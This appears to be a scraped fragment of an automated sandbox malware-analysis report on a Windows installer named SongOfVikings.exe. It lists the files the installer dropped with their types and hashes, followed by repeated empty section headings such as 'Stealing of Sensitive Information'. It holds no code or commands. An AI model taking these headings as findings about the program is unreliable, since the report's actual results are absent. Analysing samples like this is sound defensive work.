C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\ja.pak	data	F47EFAA76F5200A6C0C23C33684D7BAD	9B24F6491A1171D3DFEAE329E1F45AB3E3D9CF22	5B99D6A11D7B653681B2A2BB616CC1814451AD35C370D178B2EF6650465D4F2A
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\kn.pak	data	A603F3D899CCDCD9AF20DCD8F87D0ED8	F476355D6EA5C05B35AD74C08E2EDFE5FF2881AD	3C11A589AAB0C5D9E5C18E6A95DCE7E613089D3598B8FE54E656A8D97E22A6FD
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\ko.pak	data	B83BC27C5BC2BB4D0FF7934DB87E12AD	050F004E82F46053B6566300C9A7B1A6A6E84209	AB3060E7D16DE4D1536FF6DD4F82939A73388201AD7E2BE15F3AFEE6A5AAE0EF
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\lt.pak	data	96602A3F3B59FAA997A4D337889FA02B	94593A270B0D84C006E0959BC136B6C4987DFD3F	51DB5311DE9DFF41FB4EADDA8BA7D5E492912F72C3754ADAF8E3DE23ABA46F8A
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\lv.pak	data	E4F7D9E385CB525E762ECE1AA243E818	689D784379BAC189742B74CD8700C687FEEEDED1	523D141E59095DA71A41C14AEC8FE9EE667AE4B868E0477A46DD18A80B2007EF
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\ml.pak	data	3B1305ECCA60FB5A7B3224A70398EAD9	04E28FCE93FC57360E9830E2F482028FFC58A0A2	C10942F5333F0D710DE4D3DEF7AA410C4576FFE476B3EA84AAC736BFB9C40D67
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\mr.pak	data	25F2B9842E2C4C026E0FC4BC191A6915	7DE7F82BADB2183F1F294B63CA506322F4F2AAFA	771EB119A20FCC5E742A932A9A8C360A65C90A5FE26AB7633419966BA3E7DB60
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\ms.pak	data	9B3E2F3C49897228D51A324AB625EB45	8F3DAEC46E9A99C3B33E3D0E56C03402CCC52B9D	61A3DAAE72558662851B49175C402E9FE6FD1B279E7B9028E49506D9444855C5
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\nb.pak	data	7576C2FA9199A4121BC4A50FF6C439C3	55E3E2E651353E7566ED4DBE082FFC834363752B	2A3DFC6B41FA50FABED387CB8F05DEBBC530FA191366B30C9CB9EAAE50686BD5
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\nl.pak	data	BC41967B2FF493E7F151C7721245739D	7606133DDBB58492DBBF02C03A975FB48DA1E26F	3DBE5569F53D1314DCB1BC99540CF6A0FEA45B6D67576FD0D14C688107892F32
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\pl.pak	data	61C093FAC4021062E1838A32D79399C2	84A47537EF58D2507CF7697EA7E1E27B1F812EE8	58067EC06973F5DD7AFEBBE57BFFCE3A3ED9F8E5093AF8FCEFDB6A65B2B68B22
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\pt-BR.pak	data	A23C805EE4D3D67C811B50826CA25A51	C14FA8B9C7073FE88E188CFA4B34883FACCC2C09	62BE4FB0BD3B8BE563516BFEA3F0848924BB7AFB0C563D02C1508608A4487E3B
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\pt-PT.pak	data	ACFFA29064F40A014BC7FE13E5FF58A9	5A0890C94084075446264469818753F699A3D154	423E7CCB22D32276320ED72F07186188E095C577DB5BCE7309C8BD589A2A8858
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\ro.pak	data	19CFC7C8F1A2E4A2DE1F9F64475469BC	BF6C4F373C19B03E116D2593C64E1CECA47D79DC	3E725F7A791AED1FBED57F075CA11CE389A5BD425CCCE3C00537DAD27E5A8DD6
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\ru.pak	data	FC0E2FC09AA9089C5DB75BAB7A0754A7	F3D1E3E1600AE188E801A81B6D233DB9903B82DF	188B6405CB6C5B7C0B35050278A119C3CE41FB90883B9ADB39FEC15DA0A05550
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\sk.pak	data	793C442420F27D54410CDB8D8ECCE5FF	8995E9E29DBAAA737777E9C9449B67CA4C5B4066	5A9D6B77CA43C8ED344416D854C2D945D8613E6C7936445D6FE35E410C7190BB
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\sl.pak	data	4D9D56EF0B176E7F7AA14270E964EC77	515AAC37E4F25CA50BD52EA73889B70B1E79863D	6BA684A8F06F7EB175955B15D30C7162D92C7E7C48864DFB853238263E1BE8C7
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\sr.pak	data	CF160983A86B51EC42845F4E60AC9123	4D3BD86A7EF1EAADB8BEC0B79ECC6C05B4273A48	EF07512FB337005BB66696C69722A0D65BFB749B9D2F763F5B2FF2885CB247A4
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\sv.pak	data	BBE0785C5F9591E8A1E7C4830FE949D6	DA4F3286079D50E1C04E923529E03E7D334C7FFF	0AD84F6F95FD7505862278A7C1C92D00A7E7DD4A765569E9C3086F55C1D7059D
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\sw.pak	data	EE8DA42FFE40FBB916C56390E2CD99E8	6D824F56AFE6B3605A881D2C26E69A46E6675347	192E248C7AC4644F8712CF5032DA1C6063D70662216CCF084205F902253AA827
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\ta.pak	data	A8BEAB6896018A6D37F9B2E5BDD7A78C	64310684247219A14AC3AC3B4C8EBAA602C5F03A	C68B708BA61B3EEAB5AE81D9D85D6E9F92E416ECFAE92E8DE9965608732384DF
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\te.pak	data	02415DED02CC7AC25E8F8D0E83365061	5A25BF63EC97DBEB37E64AB3825CBBCE6326A5CF	97024F0CFAC78E0C738E771BEEA1E35F5A8EB2B132B3043B59CE4ECD6C153523
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\th.pak	data	293AD7C20C22D744E4DB0FB001EC45BB	486C9E0732306A45ACEB633DA2B3DED281197620	D67D68F24D3347E244A7E8C3B63D47F18FCF37258256F48DAD785CF98BB560FA
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\tr.pak	data	9F24F44CAC0997E1D0A6A419520F3BFE	EDB61859CBB5D77C666AAC98379D4155188F4FF5	3AFF7DCBFB1A244CC29B290376B52CFB3E1F844C98FACAFEA17B4A45CE064B8A
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\uk.pak	data	E4C4E3700469704B936460CA1A90FCC0	E809990FC07A1D39FE623046382699E648E343C0	29AF2ABC75A35BB9E3F9BC6E2904228BA651EA4E0CE8E9C7A2D7E272374B9EBB
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\ur.pak	data	D7EC7D551DEE1E1EF11BE3E2820052F9	D7F2D35841883103C2773FC093A9A706B2FE5D36	05E45371159075048DB688564B6BC707E0891303C40F490C3DB428B0EDD36102
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\vi.pak	data	9274866D7C6314F43DD63ED293293E25	4AF0E6EC1BCB99588810A9FB69C1DC2BBAD892FC	DCBDC6D9E11DD10FC1364C10BE5438CE2697F61EC5F32997C43B87238087C4E3
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\zh-CN.pak	data	9D4F54EB5A12CF4C2F34F5F538DFF90B	C31B892CE78C733BDE0571B6236170103CC9FE7A	58B934A09858F037F1966A495E73D44416180AFCDEBFAEFCEE1F5E3377DE63F7
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\locales\zh-TW.pak	data	8F67A9F38AD36D7D4A6B48E63852208D	F087C85C51BDBDEF5998CFC3790835DA95DA982A	92F26E692DC1309558F90278425A7E83E56974B6AF84DBD8CC90324785EE71CA
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\resources.pak	data	31C7D4B11AD95DFE539DD098E0FAB736	5418682D939CE8485ECC9125B872C14FFEC662C2	A251019EB08F1E695E935D224544BDA37C5AE092BA68A89FA1FE3BD19BDE4F5C
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\resources\app.asar	data	B7AA878C6DF7EA259375742D8EE28E28	2504562401DF78C21C1E9C242AEC041AB0D4C3C9	5189263EECAFDE28330823ACB7E9C85A0DC527F7F9C69A01C0891DFAF89B7A51
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\resources\elevate.exe	PE32 executable (console) Intel 80386, for MS Windows	792B92C8AD13C46F27C7CED0810694DF	D8D449B92DE20A57DF722DF46435BA4553ECC802	9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\snapshot_blob.bin	data	4EBD06BDF6CF8DACF6597586FD1704B5	E6819EF37F99F91468F4B94370A4AB467A075A6D	148E4B85983F0D27ADECD9C6431B66379AC5538688F320E89D74FF6D48BB740B
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\v8_context_snapshot.bin	data	146E284750735EF4798527DC1CD0E741	6408985B7D05C768A62BCB912234F14E1898FFDB	3820E8FA1077D02606FEA8E1B3A9CA4BF7F4A71D0569D9A8EA9EE7A009D0CE80
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\vk_swiftshader.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	750CBDFB01943E28E08708183EC208B5	1BEE0CD3D0970834B2A47DAF384354F243FD1EE0	A6D295DCC3AFCB55AA79EAC5F896BCEB15CCB2B798DB3BB076CEEEA78073791A
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\vk_swiftshader_icd.json	JSON data	8642DD3A87E2DE6E991FAE08458E302B	9C06735C31CEC00600FD763A92F8112D085BD12A	32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\7z-out\vulkan-1.dll	PE32+ executable (DLL) (console) x86-64, for MS Windows	6C70AAB071C4FEBC5921E0D39811937A	20D87B3A5333EA3F6D0D7B0333F2C30A281937AA	2233FEF6788711089FC5C1A008BFFF6559CF2FC3E8363CD8A50196E90D1D9825
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\SpiderBanner.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	17309E33B596BA3A5693B4D3E85CF8D7	7D361836CF53DF42021C7F2B148AEC9458818C01	996A259E53CA18B89EC36D038C40148957C978C0FD600A268497D4C92F882A93
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\StdUtils.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	C6A6E03F77C313B267498515488C5740	3D49FC2784B9450962ED6B82B46E9C3C957D7C15	B72E9013A6204E9F01076DC38DABBF30870D44DFC66962ADBF73619D4331601E
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	0D7AD4F45DC6F5AA87F606D0331C6901	48DF0911F0484CBE2A8CDD5362140B63C41EE457	3EB38AE99653A7DBC724132EE240F6E5C4AF4BFE7C01D31D23FAF373F9F2EACA
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\app-64.7z	7-zip archive data, version 0.4	0076D4790ECFF55BD4D0C163248FC8E3	0DE0EF9D8450DA8787E183495ABEDF1718E82349	D80DD04D2F2BB95539BECE6C99D6FD274470B975554F44B7F1371313AF0B03DF
C:\Users\user\AppData\Local\Temp\nsjF3C0.tmp\nsis7z.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	80E44CE4895304C6A3A831310FBF8CD0	36BD49AE21C460BE5753A904B4501F1ABCA53508	B393F05E8FF919EF071181050E1873C9A776E1A0AE8329AEFFF7007D0CADF592
C:\Users\user\AppData\Roaming\SongOfVikings\17188df5-ad26-4f3e-b9c7-9b5079b7749f.tmp	JSON data	3C64295DC76D51AC66BDFADC60F4D63B	281478EA12F89817ADCE76499B86728CC6A43723	719A80BD688CF9904A6F588EFA0FC528C0A1EB20CC959742B49C36CCFDBC03AA
C:\Users\user\AppData\Roaming\SongOfVikings\Local State (copy)	JSON data	3C64295DC76D51AC66BDFADC60F4D63B	281478EA12F89817ADCE76499B86728CC6A43723	719A80BD688CF9904A6F588EFA0FC528C0A1EB20CC959742B49C36CCFDBC03AA

Windows Analysis Report
SongOfVikings.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Windows Analysis Report SongOfVikings.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Windows Analysis Report
SongOfVikings.exe